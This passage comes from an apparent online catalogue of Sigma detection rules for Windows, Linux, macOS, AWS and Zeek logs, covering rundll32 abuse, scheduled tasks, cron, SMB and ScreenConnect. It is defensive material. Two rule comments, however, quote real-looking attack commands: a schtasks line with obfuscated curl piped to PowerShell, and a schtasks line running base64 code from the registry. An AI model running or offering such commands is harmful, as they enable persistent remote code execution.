condition: keywords
falsepositives:
- Application bugs
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Run Once Task Configuration in Registry
Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
view Sigma YAML
title: Run Once Task Configuration in Registry
id: c74d7efc-8826-45d9-b8bb-f04fac9e4eff
status: test
description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup
references:
- https://twitter.com/pabraeken/status/990717080805789697
- https://lolbas-project.github.io/lolbas/Binaries/Runonce/
author: 'Avneet Singh @v3t0_, oscd.community'
date: 2020-11-15
modified: 2024-03-25
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
logsource:
product: windows
category: registry_event
detection:
selection:
TargetObject|contains: '\Microsoft\Active Setup\Installed Components'
TargetObject|endswith: '\StubPath'
filter_optional_chrome:
Details|contains|all:
- 'C:\Program Files\Google\Chrome\Application\'
- '\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level' # In some cases the Details will contain an additional flag called "--channel=stable" at the end
filter_optional_edge:
Details|contains:
- 'C:\Program Files (x86)\Microsoft\Edge\Application\'
- 'C:\Program Files\Microsoft\Edge\Application\'
Details|endswith: '\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Legitimate modification of the registry key by legitimate program
level: medium
Convert to SIEM query
medium
Moderate
High FP
Rundll32 InstallScreenSaver Execution
An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
view Sigma YAML
title: Rundll32 InstallScreenSaver Execution
id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221
status: test
description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
references:
- https://lolbas-project.github.io/lolbas/Libraries/Desk/
- https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec'
date: 2022-04-28
modified: 2023-02-09
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
selection_cli:
CommandLine|contains: 'InstallScreenSaver'
condition: all of selection_*
falsepositives:
- Legitimate installation of a new screensaver
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Rundll32 Internet Connection
Detects a rundll32 that communicates with public IP addresses
view Sigma YAML
title: Rundll32 Internet Connection
id: cdc8da7d-c303-42f8-b08c-b4ab47230263
status: test
description: Detects a rundll32 that communicates with public IP addresses
references:
- https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100
author: Florian Roth (Nextron Systems)
date: 2017-11-04
modified: 2024-03-13
tags:
- attack.stealth
- attack.t1218.011
- attack.execution
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\rundll32.exe'
Initiated: 'true'
filter_main_local_ranges:
DestinationIp|cidr:
- '127.0.0.0/8'
- '10.0.0.0/8'
- '172.16.0.0/12'
- '192.168.0.0/16'
- '169.254.0.0/16'
- '::1/128' # IPv6 loopback
- 'fe80::/10' # IPv6 link-local addresses
- 'fc00::/7' # IPv6 private addresses
filter_main_ms_ranges:
DestinationIp|cidr:
- '20.0.0.0/8' # Microsoft range, caused some FPs
- '51.103.0.0/16' # Microsoft AS8075 range, caused some FPs
- '51.104.0.0/16' # Microsoft AS8075 range, caused some FPs
- '51.105.0.0/16' # Microsoft AS8075 range, caused some FPs
filter_main_app_sdb:
CommandLine|endswith: '\system32\PcaSvc.dll,PcaPatchSdbTask'
filter_main_azure_managed:
SourceHostname|endswith: '.internal.cloudapp.net'
filter_main_svchost_update_processes:
# Note: This require "ParentImage" data enrichment.
ParentImage: 'C:\Windows\System32\svchost.exe'
DestinationPort: 443
condition: selection and not 1 of filter_main_*
falsepositives:
- Communication to other corporate systems that use IP addresses from public address spaces
level: medium
Convert to SIEM query
medium
Moderate
High FP
Rundll32 Spawned Via Explorer.EXE
Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
view Sigma YAML
title: Rundll32 Spawned Via Explorer.EXE
id: 1723e720-616d-4ddc-ab02-f7e3685a4713
status: test
description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
references:
- https://redcanary.com/blog/raspberry-robin/
- https://thedfirreport.com/2022/09/26/bumblebee-round-two/
author: CD_ROM_
date: 2022-05-21
modified: 2023-08-31
tags:
- attack.stealth
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|endswith: '\explorer.exe'
selection_img:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
filter_main_generic:
- CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required
- CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
view Sigma YAML
title: Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
id: d81a9fc6-55db-4461-b962-0e78fea5b0ad
related:
- id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed # Renamed rundll32
type: similar
status: test
description: |
Detects when the DLL export function 'DllRegisterServer' is called in the commandline by Rundll32 explicitly where the DLL is located in a non-standard path.
references:
- https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
- https://www.virustotal.com/gui/file/94816439312563db982cd038cf77cbc5ef4c7003e3edee86e2b0f99e675ed4ed/behavior
- https://learn.microsoft.com/en-us/windows/win32/api/olectl/nf-olectl-dllregisterserver
author: Andreas Braathen (mnemonic.io)
date: 2023-10-17
tags:
- attack.stealth
- attack.t1218
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection_image:
- Image|endswith: '\rundll32.exe'
- OriginalFileName: 'RUNDLL32.EXE'
selection_cmdline:
CommandLine|contains: 'DllRegisterServer'
filter_main_legit_paths:
CommandLine|contains:
- ':\Program Files (x86)'
- ':\Program Files\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
condition: all of selection_* and not 1 of filter_main_*
falsepositives:
- Legitimate usage as part of application installation, but less likely from e.g. temporary paths.
- Not every instance is considered malicious, but this rule will capture the malicious usages.
level: medium
Convert to SIEM query
medium
Strong
Low FP
SCM Database Handle Failure
Detects non-system users failing to get a handle of the SCM database.
view Sigma YAML
title: SCM Database Handle Failure
id: 13addce7-47b2-4ca0-a98f-1de964d1d669
status: test
description: Detects non-system users failing to get a handle of the SCM database.
references:
- https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-12
modified: 2022-07-11
tags:
- attack.discovery
- attack.t1010
logsource:
product: windows
service: security
detection:
selection:
EventID: 4656
ObjectType: 'SC_MANAGER OBJECT'
ObjectName: 'ServicesActive'
AccessMask: '0xf003f' # is used in the reference; otherwise too many FPs
# Keywords: 'Audit Failure' <-> in the ref 'Keywords':-9214364837600034816
filter:
SubjectLogonId: '0x3e4'
condition: selection and not filter
falsepositives:
- Unknown
# triggering on many hosts in some environments
level: medium
Convert to SIEM query
medium
Strong
Low FP
SCM Database Privileged Operation
Detects non-system users performing privileged operation os the SCM database
view Sigma YAML
title: SCM Database Privileged Operation
id: dae8171c-5ec6-4396-b210-8466585b53e9
status: test
description: Detects non-system users performing privileged operation os the SCM database
references:
- https://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
date: 2019-08-15
modified: 2022-09-18
tags:
- attack.privilege-escalation
- attack.t1548
logsource:
product: windows
service: security
detection:
selection:
EventID: 4674
ObjectType: 'SC_MANAGER OBJECT'
ObjectName: 'servicesactive'
PrivilegeList: 'SeTakeOwnershipPrivilege'
filter:
SubjectLogonId: '0x3e4'
ProcessName|endswith: ':\Windows\System32\services.exe'
condition: selection and not filter
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
SCR File Write Event
Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
view Sigma YAML
title: SCR File Write Event
id: c048f047-7e2a-4888-b302-55f509d4a91d
status: test
description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
references:
- https://lolbas-project.github.io/lolbas/Libraries/Desk/
author: 'Christopher Peacock @securepeacock, SCYTHE @scythe_io'
date: 2022-04-27
modified: 2023-08-23
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: '.scr'
filter:
TargetFilename|contains:
- ':\$WINDOWS.~BT\NewOS\'
- ':\Windows\System32\'
- ':\Windows\SysWOW64\'
- ':\Windows\WinSxS\'
- ':\WUDownloadCache\' # Windows Update Download Cache
condition: selection and not filter
falsepositives:
- The installation of new screen savers by third party software
level: medium
Convert to SIEM query
medium
Moderate
Low FP
SES Identity Has Been Deleted
Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
view Sigma YAML
title: SES Identity Has Been Deleted
id: 20f754db-d025-4a8f-9d74-e0037e999a9a
status: test
description: Detects an instance of an SES identity being deleted via the "DeleteIdentity" event. This may be an indicator of an adversary removing the account that carried out suspicious or malicious activities
references:
- https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/
author: Janantha Marasinghe
date: 2022-12-13
modified: 2022-12-28
tags:
- attack.stealth
- attack.t1070
logsource:
product: aws
service: cloudtrail
detection:
selection:
eventSource: 'ses.amazonaws.com'
eventName: 'DeleteIdentity'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
SMB Spoolss Name Piped Usage
Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
view Sigma YAML
title: SMB Spoolss Name Piped Usage
id: bae2865c-5565-470d-b505-9496c87d0c30
status: test
description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
references:
- https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
- https://dirkjanm.io/a-different-way-of-abusing-zerologon/
- https://twitter.com/_dirkjan/status/1309214379003588608
author: OTR (Open Threat Research), @neu5ron
date: 2018-11-28
modified: 2022-10-09
tags:
- attack.lateral-movement
- attack.t1021.002
logsource:
product: zeek
service: smb_files
detection:
selection:
path|endswith: 'IPC$'
name: spoolss
condition: selection
falsepositives:
- Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too
level: medium
Convert to SIEM query
medium
Moderate
High FP
SMB over QUIC Via Net.EXE
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
view Sigma YAML
title: SMB over QUIC Via Net.EXE
id: 2238d337-42fb-4971-9a68-63570f2aede4
related:
- id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
type: similar
status: test
description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
- https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
author: frack113
date: 2023-07-21
tags:
- attack.lateral-movement
- attack.t1570
- detection.threat-hunting
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\net.exe'
- '\net1.exe'
- OriginalFileName:
- 'net.exe'
- 'net1.exe'
selection_cli:
CommandLine|contains: '/TRANSPORT:QUIC'
condition: all of selection_*
falsepositives:
- Administrative activity
level: medium
Convert to SIEM query
medium
Moderate
High FP
SMB over QUIC Via PowerShell Script
Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
view Sigma YAML
title: SMB over QUIC Via PowerShell Script
id: 6df07c3b-8456-4f8b-87bb-fe31ec964cae
related:
- id: 2238d337-42fb-4971-9a68-63570f2aede4
type: similar
status: test
description: Detects the mounting of Windows SMB shares over QUIC, which can be an unexpected event in some enterprise environments
references:
- https://github.com/redcanaryco/atomic-red-team/blob/74438b0237d141ee9c99747976447dc884cb1a39/atomics/T1570/T1570.md
- https://learn.microsoft.com/en-us/powershell/module/smbshare/new-smbmapping?view=windowsserver2022-ps
- https://www.trustedsec.com/blog/making-smb-accessible-with-ntlmquic/
author: frack113
date: 2023-07-21
tags:
- attack.lateral-movement
- attack.t1570
- detection.threat-hunting
logsource:
product: windows
category: ps_script
definition: 'Requirements: Script Block Logging must be enabled'
detection:
selection:
ScriptBlockText|contains|all:
- 'New-SmbMapping'
- '-TransportType QUIC'
condition: selection
falsepositives:
- Due to the nature of the script block, the matching of the string could sometimes result in a false positive. Use this rule to hunt for potential malicious or suspicious scripts.
level: medium
Convert to SIEM query
medium
Moderate
High FP
SQL Client Tools PowerShell Session Detection
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
view Sigma YAML
title: SQL Client Tools PowerShell Session Detection
id: a746c9b8-a2fb-4ee5-a428-92bee9e99060
status: test
description: |
This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
references:
- https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml
- https://twitter.com/pabraeken/status/993298228840992768
author: 'Agro (@agro_sev) oscd.communitly'
date: 2020-10-13
modified: 2022-02-25
tags:
- attack.execution
- attack.stealth
- attack.t1059.001
- attack.t1127
logsource:
category: process_creation
product: windows
detection:
selection:
- Image|endswith: '\sqltoolsps.exe'
- ParentImage|endswith: '\sqltoolsps.exe'
- OriginalFileName: '\sqltoolsps.exe'
filter:
ParentImage|endswith: '\smss.exe'
condition: selection and not filter
falsepositives:
- Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
SSHD Error Message CVE-2018-15473
Detects exploitation attempt using public exploit code for CVE-2018-15473
view Sigma YAML
title: SSHD Error Message CVE-2018-15473
id: 4c9d903d-4939-4094-ade0-3cb748f4d7da
status: test
description: Detects exploitation attempt using public exploit code for CVE-2018-15473
references:
- https://github.com/Rhynorater/CVE-2018-15473-Exploit
author: Florian Roth (Nextron Systems)
date: 2017-08-24
modified: 2021-11-27
tags:
- attack.reconnaissance
- attack.t1589
- cve.2018-15473
- detection.emerging-threats
logsource:
product: linux
service: sshd
detection:
keywords:
- 'error: buffer_get_ret: trying to get more bytes 1907 than in buffer 308 [preauth]'
condition: keywords
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
view Sigma YAML
title: Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE
id: 81325ce1-be01-4250-944f-b4789644556f
related:
- id: 43f487f0-755f-4c2a-bce7-d6d2eec2fcf8 # TODO: Recreate after baseline
type: derived
status: test
description: Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware
references:
- https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
- https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04
- https://blog.talosintelligence.com/gophish-powerrat-dcrat/
author: Florian Roth (Nextron Systems)
date: 2022-02-21
modified: 2025-10-07
tags:
- attack.privilege-escalation
- attack.persistence
- attack.execution
- attack.t1053.005
logsource:
product: windows
category: process_creation
detection:
selection_1_create:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_1_all_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Users\All Users\'
- ':\Users\Default\'
- ':\Users\Public'
- ':\Windows\Temp'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '%AppData%'
- '%Public%'
selection_2_parent:
ParentCommandLine|endswith: '\svchost.exe -k netsvcs -p -s Schedule'
selection_2_some_folders:
CommandLine|contains:
- ':\Perflogs'
- ':\Windows\Temp'
- '\Users\Public'
- '%Public%'
filter_optional_other:
- ParentCommandLine|contains: 'unattended.ini'
- CommandLine|contains: 'update_task.xml'
filter_optional_team_viewer:
CommandLine|contains: '/Create /TN TVInstallRestore /TR'
filter_optional_avira_install:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /Xml '
- '\Temp\.CR.'
- '\Avira_Security_Installation.xml'
filter_optional_avira_other:
# Comment out this filter if you dont use AVIRA
CommandLine|contains|all:
- '/Create /F /TN'
- '/Xml '
- '\Temp\'
- 'Avira_'
CommandLine|contains:
- '.tmp\UpdateFallbackTask.xml'
- '.tmp\WatchdogServiceControlManagerTimeout.xml'
- '.tmp\SystrayAutostart.xml'
- '.tmp\MaintenanceTask.xml'
filter_optional_klite_codec:
CommandLine|contains|all:
- '\Temp\'
- '/Create /TN "klcp_update" /XML '
- '\klcp_update_task.xml'
condition: ( all of selection_1_* or all of selection_2_* ) and not 1 of filter_optional_*
falsepositives:
- Benign scheduled tasks creations or executions that happen often during software installations
- Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Scheduled Cron Task/Job - Linux
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
view Sigma YAML
title: Scheduled Cron Task/Job - Linux
id: 6b14bac8-3e3a-4324-8109-42f0546a347f
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: linux
detection:
selection:
Image|endswith: 'crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Scheduled Cron Task/Job - MacOs
Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
view Sigma YAML
title: Scheduled Cron Task/Job - MacOs
id: 7c3b43d8-d794-47d2-800a-d277715aa460
status: test
description: Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md
author: Alejandro Ortuno, oscd.community
date: 2020-10-06
modified: 2022-11-27
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.003
logsource:
category: process_creation
product: macos
detection:
selection:
Image|endswith: '/crontab'
CommandLine|contains: '/tmp/'
condition: selection
falsepositives:
- Legitimate administration activities
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Scheduled Task Creation From Potential Suspicious Parent Location
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
view Sigma YAML
title: Scheduled Task Creation From Potential Suspicious Parent Location
id: 9494479d-d994-40bf-a8b1-eea890237021
status: test
description: |
Detects the execution of "schtasks.exe" from a parent that is located in a potentially suspicious location.
Multiple malware strains were seen exhibiting a similar behavior in order to achieve persistence.
references:
- https://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/
author: Florian Roth (Nextron Systems)
date: 2022-02-23
modified: 2024-05-13
tags:
- attack.execution
- attack.persistence
- attack.privilege-escalation
- attack.t1053.005
- detection.threat-hunting
logsource:
product: windows
category: process_creation
detection:
selection:
ParentImage|contains:
- ':\Temp\'
- '\AppData\Local\'
- '\AppData\Roaming\'
- '\Temporary Internet'
- '\Users\Public\'
- '\Windows\Temp\'
Image|endswith: '\schtasks.exe'
CommandLine|contains: '/Create '
filter_optional_common:
CommandLine|contains:
- 'update_task.xml'
- 'unattended.ini'
condition: selection and not 1 of filter_optional_*
falsepositives:
- Software installers that run from temporary folders and also install scheduled tasks
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Scheduled Task Creation with Curl and PowerShell Execution Combo
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
view Sigma YAML
title: Scheduled Task Creation with Curl and PowerShell Execution Combo
id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
status: experimental
description: |
Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.
references:
- https://tria.ge/241015-l98snsyeje/behavioral2
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-02-05
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.stealth
- attack.t1053.005
- attack.t1218
- attack.command-and-control
- attack.t1105
logsource:
category: process_creation
product: windows
detection:
# Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
selection_img:
Image|endswith: '\schtasks.exe'
CommandLine|contains|windash: ' /create '
selection_curl:
CommandLine|contains|all:
- 'curl '
- 'http'
- '-o'
selection_powershell:
CommandLine|contains: 'powershell'
condition: all of selection_*
falsepositives:
- Legitimate use of schtasks for administrative purposes.
- Automation scripts combining curl and PowerShell in controlled environments.
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Scheduled Task Executed From A Suspicious Location
Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
view Sigma YAML
title: Scheduled Task Executed From A Suspicious Location
id: 424273ea-7cf8-43a6-b712-375f925e481f
status: test
description: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|contains:
- 'C:\Windows\Temp\'
- '\AppData\Local\Temp\'
- '\Desktop\'
- '\Downloads\'
- '\Users\Public\'
- 'C:\Temp\'
# If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it
# filter:
# TaskName: '\Exact\Task\Name'
# Path: 'Exact\Path'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Scheduled Task Executed Uncommon LOLBIN
Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
view Sigma YAML
title: Scheduled Task Executed Uncommon LOLBIN
id: f0767f15-0fb3-44b9-851e-e8d9a6d0005d
status: test
description: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
references:
- Internal Research
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-05
modified: 2023-02-07
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
logsource:
product: windows
service: taskscheduler
definition: 'Requirements: The "Microsoft-Windows-TaskScheduler/Operational" is disabled by default and needs to be enabled in order for this detection to trigger'
detection:
selection:
EventID: 129 # Created Task Process
Path|endswith:
- '\calc.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\mspaint.exe'
- '\notepad.exe'
- '\regsvr32.exe'
# - '\rundll32.exe'
- '\wscript.exe'
# filter_system:
# Path|endswith: '\rundll32.exe'
# TaskName|startswith: '\Microsoft\Windows\'
# condition: selection and not 1 of filter_*
condition: selection
falsepositives:
- False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule
level: medium
Convert to SIEM query
medium
Strong
Medium FP
Scheduled Task Executing Payload from Registry
Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
view Sigma YAML
title: Scheduled Task Executing Payload from Registry
id: 86588b36-c6d3-465f-9cee-8f9093e07798
related:
- id: c4eeeeae-89f4-43a7-8b48-8d1bdfa66c78
type: derived
status: test
description: Detects the creation of a schtasks that potentially executes a payload stored in the Windows Registry using PowerShell.
references:
- https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2023-07-18
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.t1053.005
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_img:
# schtasks.exe /Create /F /TN "{97F2F70B-10D1-4447-A2F3-9B070C86E261}" /TR "cmd /c start /min \"\" powershell.exe -Command IEX([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String((Get-ItemProperty -Path HKCU:\SOFTWARE\Pvoeooxf).yzbbvhhdypa))) " /SC MINUTE /MO 30
- Image|endswith: '\schtasks.exe'
- OriginalFileName: 'schtasks.exe'
selection_cli_create:
CommandLine|contains: '/Create'
selection_cli_get:
CommandLine|contains:
- 'Get-ItemProperty'
- ' gp ' # Alias
selection_cli_hive:
CommandLine|contains:
- 'HKCU:'
- 'HKLM:'
- 'registry::'
- 'HKEY_'
filter_main_encoding:
CommandLine|contains:
- 'FromBase64String'
- 'encodedcommand'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
Medium FP
Screen Capture Activity Via Psr.EXE
Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
view Sigma YAML
title: Screen Capture Activity Via Psr.EXE
id: 2158f96f-43c2-43cb-952a-ab4580f32382
status: test
description: Detects execution of Windows Problem Steps Recorder (psr.exe), a utility used to record the user screen and clicks.
references:
- https://lolbas-project.github.io/lolbas/Binaries/Psr/
- https://web.archive.org/web/20200229201156/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493861893.pdf
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md
author: Beyu Denis, oscd.community
date: 2019-10-12
modified: 2024-01-04
tags:
- attack.collection
- attack.t1113
logsource:
category: process_creation
product: windows
detection:
selection:
Image|endswith: '\Psr.exe'
CommandLine|contains:
- '/start'
- '-start'
condition: selection
falsepositives:
- Unknown
level: medium
Convert to SIEM query
medium
Moderate
High FP
ScreenConnect Temporary Installation Artefact
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
view Sigma YAML
title: ScreenConnect Temporary Installation Artefact
id: fec96f39-988b-4586-b746-b93d59fd1922
status: test
description: |
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.
These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.
Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows
author: frack113
date: 2022-02-13
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains: '\Bin\ScreenConnect.' # pattern to dll and jar file
condition: selection
falsepositives:
- Legitimate use
level: medium
Convert to SIEM query
medium
Strong
High FP
ScreenConnect User Database Modification
Detects file modifications to the temporary xml user database file indicating local user modification in the ScreenConnect server.
This will occur during exploitation of the ScreenConnect Authentication Bypass vulnerability (CVE-2024-1709) in versions <23.9.8, but may also be observed when making legitimate modifications to local users or permissions.
view Sigma YAML
title: ScreenConnect User Database Modification
id: 1a821580-588b-4323-9422-660f7e131020
related:
- id: 4109cb6a-a4af-438a-9f0c-056abba41c6f
type: similar
status: test
description: |
